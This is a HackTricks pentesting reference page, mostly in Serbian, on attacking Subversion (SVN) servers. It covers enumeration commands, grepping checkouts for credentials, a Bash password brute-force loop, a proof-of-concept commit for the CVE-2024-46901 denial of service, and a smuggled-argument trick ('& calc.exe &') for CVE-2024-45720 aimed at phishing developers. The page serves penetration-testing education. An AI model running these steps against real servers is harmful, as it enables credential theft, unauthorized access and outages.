3690/tcp - Pentesting Subversion (SVN) Server

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Osnovne informacije

Subversion (SVN) je centralizovani sistem za kontrolu verzija (Apache licenca) koji se koristi za verzionisanje softvera i upravljanje revizijama.

Podrazumevani port: 3690/tcp (svnserve). Može biti izložen i preko HTTP/HTTPS korišćenjem mod_dav_svn i preko svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion

nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

Enumeracija

# Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

# If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

# Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

  • svnserve.conf may allow anon-access = read (or even write). If you can list, try checkout to dump secrets, scripts, CI tokens.
  • Repositories frequently store build pipelines, deployment keys, and database credentials in versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n ..
  • If svn+ssh is enabled, user shells often allow restricted svnserve commands; attempt ssh user@host svnserve -t with crafted subcommands to bypass wrappers.

Bruteforcing credentials (svnserve)

sasl authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
for p in $(cat /tmp/passlist); do
svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
done
done

Nedavne ranjivosti (praktični uticaj)

mod_dav_svn DoS putem kontrolnih karaktera (CVE-2024-46901)

  • Korisnik sa pravima za commit može upisati putanju koja sadrži kontrolne karaktere (npr. \x01, \x7f) koja oštećuje repozitorijum, zbog čega kasniji checkout-i/logovi mogu da zakažu i potencijalno sruše mod_dav_svn procese.
  • Pogađa Subversion ≤ 1.14.4 kada se servira preko HTTP(S) (mod_dav_svn). Ispravljeno u 1.14.5.
  • PoC commit pomoću svnmucc (requires valid commit creds):
# create payload file
printf 'pwn' > /tmp/payload
# commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
  • Nakon commit-a, normalni klijenti mogu da se sruše ili odbiju update dok administratori ručno ne uklone reviziju pomoću svnadmin dump/filter/load.

Windows argument injection in svn client (CVE-2024-45720)

  • Na Windows-u, “best-fit” kodiranje karaktera u svn.exe omogućava command-line argument injection pri obradi posebno konstruisanih non‑ASCII paths/URLs, što potencijalno može dovesti do izvršenja proizvoljnih programa.
  • Pogađa Subversion ≤ 1.14.3 samo na Windows-u; ispravljeno u 1.14.4. Površina napada: phishing developera da pokrene svn na URL/path pod kontrolom napadača.
  • Pentest angle: ako kontrolišete network share ili ZIP koji date Windows dev-u, imenujte repo URL ili working-copy path koji sadrži best-fit bajtove koji se dekoduju u " & calc.exe & "-stil ubacenih argumenata, pa prevarite žrtvu da pokrene svn status ili slično na tom path-u.

Napomene za workflow eksploatacije

  1. Proverite način pristupa: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
  2. Pokušajte anonymous read prvo; zatim spray common creds. Ako se koristi HTTP Basic, reuse creds pronađene drugde.
  3. Enumerate hooks: hooks/pre-commit, post-commit skripte ponekad sadrže plaintext credentials ili hostnames.
  4. Leverage svn:externals da povučete dodatne paths sa drugih hostova; nabrojte ih sa svn propget svn:externals -R . nakon checkout-a.
  5. Version leaks: HTTP response headers od mod_dav_svn obično prikazuju Subversion & Apache verziju; uporedite protiv 1.14.5 da uočite vuln targets.
  6. Ako dobijete filesystem access do repo-a, svnadmin dump/svnlook author/svnlook dirs-changed omogućavaju offline analizu bez credentials.

Reference

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks